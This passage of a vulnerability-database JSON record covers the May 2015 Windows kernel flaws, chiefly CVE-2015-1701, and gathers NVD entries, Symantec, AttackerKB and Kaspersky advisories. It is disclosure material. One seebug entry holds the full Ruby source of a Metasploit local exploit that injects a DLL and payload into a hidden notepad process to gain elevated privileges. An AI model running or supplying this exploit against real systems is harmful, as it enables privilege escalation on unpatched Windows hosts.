"CVE-2015-1677", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1677", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1676, CVE-2015-1677, CVE-2015-1678, and CVE-2015-1680.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1679", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2015-1679"], "modified": "2019-05-13T20:30:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1679", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1676, CVE-2015-1677, CVE-2015-1679, and CVE-2015-1680.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1678", "type": "cve", "cwe": ["CWE-200"], 
"bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1678"], "modified": "2019-05-13T20:24:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1678", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1678", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:01", "description": "Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, 
and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka \"Win32k Elevation of Privilege Vulnerability.\"", "edition": 6, "cvss3": {}, "published": "2015-04-21T10:59:00", "title": "CVE-2015-1701", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1701"], "modified": "2020-05-14T21:15:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_2003_server:*", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1701", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1701", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_2003_server:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*"]}], "attackerkb": [{"lastseen": "2020-11-23T18:08:26", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "description": "Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka \u201cWin32k Elevation of Privilege Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 23, 2020 6:03pm UTC 
reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-30T00:00:00", "published": "2015-04-21T00:00:00", "id": "AKB:4D68F6C9-C824-4E40-8B94-3BEB1311F432", "href": "https://attackerkb.com/topics/gsWNaBaFfD/cve-2015-1701", "type": "attackerkb", "title": "CVE-2015-1701", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-12T14:14:48", "bulletinFamily": "software", "cvelist": ["CVE-2015-1701"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will result in the complete compromise of affected computers.\n\n### Technologies Affected\n\n * Microsoft Windows \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. 
\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-04-18T00:00:00", "published": "2015-04-18T00:00:00", "id": "SMNTC-74245", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74245", "type": "symantec", "title": "Microsoft Windows CVE-2015-1701 Local Privilege Escalation Vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-11T18:48:57", "bulletinFamily": "software", "cvelist": ["CVE-2015-1676"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for 
trusted individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74483", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74483", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1676 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-12T02:29:29", "bulletinFamily": "software", "cvelist": ["CVE-2015-1680"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. 
This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74497", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74497", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1680 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:42:35", "bulletinFamily": "software", "cvelist": ["CVE-2015-1677"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted 
individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74494", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74494", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1677 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:39:21", "bulletinFamily": "software", "cvelist": ["CVE-2015-1679"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. 
This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74496", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74496", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1679 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:42:50", "bulletinFamily": "software", "cvelist": ["CVE-2015-1678"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information such as kernel memory contents. This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 R2 Service Pack 2 \n * Microsoft Windows Server 2003 R2 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted 
individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SMNTC-74495", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/74495", "type": "symantec", "title": "Microsoft Windows Kernel Mode Driver CVE-2015-1678 Local Information Disclosure Vulnerability", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T11:58:01", "description": "No description provided by source.", "published": "2017-04-25T00:00:00", "type": "seebug", "title": "MS15-051 Win32k ClientCopyImage Elevation of Privilege Vulnerability (CVE-2015-1701)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2017-04-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93039", "id": "SSV:93039", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\nrequire 'rex'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows ClientCopyImage Win32k Exploit',\r\n 'Description' => %q{\r\n This module exploits improper object handling in the win32k.sys kernel mode driver.\r\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\r\n Windows 2008 R2 SP1 
x64.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Unknown', # vulnerability discovery and exploit in the wild\r\n 'hfirefox', # Code released on github\r\n 'OJ Reeves', # msf module\r\n 'Spencer McIntyre' # msf module\r\n ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'Platform' => 'win',\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' => [\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'Payload' => {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'References' => [\r\n ['CVE', '2015-1701'],\r\n ['MSB', 'MS15-051'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],\r\n ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],\r\n ['URL', 'https://technet.microsoft.com/library/security/MS15-051']\r\n ],\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def check\r\n # Windows XP SP3 (32-bit) 5.1.2600.6514 (Works)\r\n # Windows Server 2003 Standard SP2 (32-bit) 5.2.3790.5445 (Works)\r\n # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)\r\n # Windows 7 SP1 (64-bit) 6.1.7601.17514 (Works)\r\n # Windows 7 SP1 (64-bit) 6.1.7601.17535 (Works)\r\n # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)\r\n # Windows 7 SP1 (32-bit) 6.1.7601.18388 (Works)\r\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)\r\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.18105 (Works)\r\n\r\n if sysinfo['OS'] !~ /windows/i\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /(wow|x)64/i\r\n arch = ARCH_X64\r\n elsif sysinfo['Architecture'] =~ /x86/i\r\n arch = ARCH_X86\r\n end\r\n\r\n file_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys'\r\n major, minor, build, revision, branch = file_version(file_path)\r\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} 
branch: #{branch}\")\r\n\r\n return Exploit::CheckCode::Safe if build > 7601\r\n\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n\r\n check_result = check\r\n if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown\r\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\r\n end\r\n\r\n if sysinfo['Architecture'] == ARCH_X64\r\n if session.arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\r\n end\r\n\r\n if target.arch.first == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\r\n end\r\n elsif target.arch.first == ARCH_X64\r\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\r\n end\r\n\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Meterpreter::RequestError\r\n # Reader Sandbox won't allow to create a new process:\r\n # stdapi_sys_process_execute: Operation failed: Access is denied.\r\n print_status('Operation failed. 
Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n if target.arch.first == ARCH_X86\r\n dll_file_name = 'cve-2015-1701.x86.dll'\r\n else\r\n dll_file_name = 'cve-2015-1701.x64.dll'\r\n end\r\n\r\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n\r\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93039", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2020-09-02T11:57:15", "bulletinFamily": "info", "cvelist": ["CVE-2015-1684", "CVE-2015-1676", "CVE-2015-1677", "CVE-2015-1686", "CVE-2015-1679", "CVE-2015-1681", "CVE-2015-1678", "CVE-2015-1673", "CVE-2015-1701", "CVE-2015-1716", "CVE-2015-1674", "CVE-2015-1680", "CVE-2015-1702", "CVE-2015-1672"], "description": "### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft products. 
Malicious users can exploit these vulnerabilities to bypass security restrictions, cause denial of service, gain privileges or obtain sensitive information.\n\n### *Affected products*:\nWindows Server 2003 x86, x64, Itanium Service Pack 2 \nWindows Vista x86, x64 Service Pack 2 \nWindows Server 2008 x86, x64, Itanium Service Pack 2 \nWindows 7 x86, x64 Service Pack 1 \nWindows Server 2008 R2 x64, Itanium Service Pack 1 \nWindows 8, 8.1 x86, x64 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows RT \nWindows RT 8.1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Microsoft bulletin](<https://technet.microsoft.com/en-us/library/security/ms15-055>) \n[CVE-2015-1686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1686>) \n[CVE-2015-1684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1684>) \n[CVE-2015-1702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1702>) \n[CVE-2015-1679](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1679>) \n[CVE-2015-1678](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1678>) 